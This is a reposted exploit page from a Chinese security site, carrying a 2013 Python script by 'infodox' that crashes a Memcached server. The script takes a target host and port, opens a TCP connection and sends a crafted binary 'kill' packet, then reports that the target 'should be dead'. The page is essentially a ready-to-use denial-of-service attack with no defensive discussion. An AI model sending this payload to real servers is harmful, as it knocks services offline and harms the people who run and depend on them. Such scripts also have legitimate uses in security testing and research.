首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Memcached Remote Denial Of Service
来源:insecurety.net 作者:infodox 发布时间:2013-05-02  
#!/usr/bin/python
# Author: infodox // @info_dox
# Site: insecurety.net
# Old bug, still unpatched. Patch nao?
import sys
import socket

print "Memcached Remote DoS - Bursting Clouds yo!"
if len(sys.argv) != 3:
    print "Usage: %s <host> <port>" %(sys.argv[0])
    sys.exit(1)

target = sys.argv[1]
port = sys.argv[2]

print "[+] Target Host: %s" %(target)
print "[+] Target Port: %s" %(port)

kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"""
kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""
kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea"""

hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    hax.connect((target, int(port)))
    print "[+] Connected, firing payload!"
except:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)
try:
    hax.send(kill)
    print "[+] Payload Sent!"
except:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)
hax.close()
print "[*] Should be dead..."


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Elecard MPEG Player 5.8 Buffer
·SAP ConfigServlet Remote Code
·GroundWork monarch_scan.cgi OS
·Personal File Share HTTP Serve
·Windows Light HTTPD 0.1 - Buff
·AudioCover 0.8.18 Buffer Overf
·SAP ConfigServlet Remote Unaut
·sudo v1.8.0-1.8.3p1 (sudo_debu
·GroundWork monarch_scan.cgi OS
·Syslog Watcher Pro 2.8.0.812 -
·Mikrotik Syslog Server for Win
·phpMyAdmin Authenticated Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved